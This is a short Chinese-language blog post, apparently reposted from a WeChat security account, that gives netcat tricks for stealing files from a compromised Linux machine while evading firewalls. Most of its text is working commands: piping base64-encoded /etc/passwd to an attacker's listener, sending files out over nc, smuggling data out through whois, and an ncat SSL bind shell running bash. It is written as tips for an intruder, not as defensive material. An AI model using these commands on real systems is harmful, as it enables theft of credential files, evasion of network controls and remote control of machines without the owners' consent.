nc加密盗取文件内容的小技巧

admin 2022年11月15日03:11:59评论41 views字数 564阅读1分52秒阅读模式

这里简单介绍一下,情况是这样

我们入侵Linux之后,植入nc后,想盗取部分内容无法直接传输,因为会遇到防火墙的拦截,这里就需要进行加密传输。

黑客端:

nc -l -p 8889 > kali.txt

受害端Linux系统:

cat /etc/passwd | base64 | nc -nv [黑客ip] 3333 -q 1

nc加密盗取文件内容的小技巧

然后黑客端的nc目录下会生成一个kali.txt,里面存放了base64加密之后的passwd内容

传输文件:

控制端:

    nc -l -p 8889 > poc.py


被控端:

    nc -nv 10.0.79.241 8889 < ./poc.py -q 1

传输的文件接收的时候命名最好是一样的

文件基本不会被防火墙拦截

在两台都是Linux的情况下,目标机器无法上传nc,可以利用whois的命令来完成

黑客机器:

nc -l -v -p 8889 |sed "s/ //g" | base64 -d

目标机器:

 whois -h [黑客IP] -p 8889 `cat /etc/passwd | base64 `

两台都是linux,并且要加密通信

nc的加密版ncat

目标:

ncat -c bash --allow [黑客ip] -vnl 3333 --ssl 

只允许黑客的ip去控制它

黑客:

nc -nv [目标ip] 3333 --ssl

nc加密盗取文件内容的小技巧

这样我们的一个命令传输过程就是完全加密了的。


原文始发于微信公众号(白安全组):nc加密盗取文件内容的小技巧

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月15日03:11:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   nc加密盗取文件内容的小技巧http://cn-sec.com/archives/1409258.html

发表评论

匿名网友 填写信息